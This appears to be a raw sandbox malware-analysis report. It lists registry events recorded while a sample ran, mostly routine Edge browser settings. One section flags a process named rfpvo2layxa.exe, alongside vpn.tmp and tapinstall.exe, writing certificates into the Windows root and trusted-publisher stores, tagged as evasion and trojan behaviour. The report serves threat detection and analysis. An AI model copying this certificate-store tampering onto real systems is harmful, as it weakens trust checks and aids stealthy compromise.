Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingDelete\C:\Users\Admin\AppData\Local\Packa = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "5"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{Q4J0B7H3-CLFC-AN4E-8Q18-7Q45PB0I3113}	rundll32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{M7E6Z6L3-BALZ-MI5F-5K37-0M55YM1D3151}\1 = "2048"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = c59b02a4102ed701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{Q4J0B7H3-CLFC-AN4E-8Q18-7Q45PB0I3113}\1 = "22"	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 02f2699f102ed701	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 6c3a3b6c55add601	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	MsiExec.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 0100000073ffd6106b2cd5e70140b16d342e099123e4ec474c4e6fc1d86b8f3776ffa8b56081aec04447d45b5e1084313961bee47c6ac46c925ba3f8766366922db961cdf4737b881c0f7e4514d8876e82a932125ab169c36f261daa9823c0628a1780a329779542c7a41a1a7c399fae0c2769b69f596cc8e6cd996b114dbcbd903b9a7f132cec968a26547b25d3f9b154f97a0dc702f8e56e72209f107fc09f3f4462f9ba312ffbdcb5ff2c76462886aa4093b2dc4c063bb333a015d25a270d6452f9a95428dac6b77171dfc2316329821c7aab56d849783832227c647f98bfd9840c143ab0b455e07abac69f362ac569ae34c47e44aac8068e7aa0b18c7266b0fc35f0b368b538aaf06d03c5f425720014e43c173132cdb466987d36239f710fd97cbd75f24c7bdbf364deca0bf929df6fadc4e23feea665dc141fe0e2fa74233b51a63ced86f287a347c9e61b79ab65e096c8d40e6d11ca0e40519b6a1e107b4290b78df846a48d20604030c4b4f23785430eba3eb88c431eae1e235c6376a20db66320b5f232bf8a026c06a67540e97f569f0570c29aa02ab625c3020d02db917f1f8df56a43e165	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\LastClosedHeight = "600"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\ImageStoreRandomFolder = "t91kmjx"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{S7V0R8R0-BTEQ-SG8D-7S08-7D82QC4B5132}	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 21 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

rfpvo2layxa.exevpn.tmptapinstall.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7	rfpvo2layxa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	rfpvo2layxa.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	rfpvo2layxa.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402a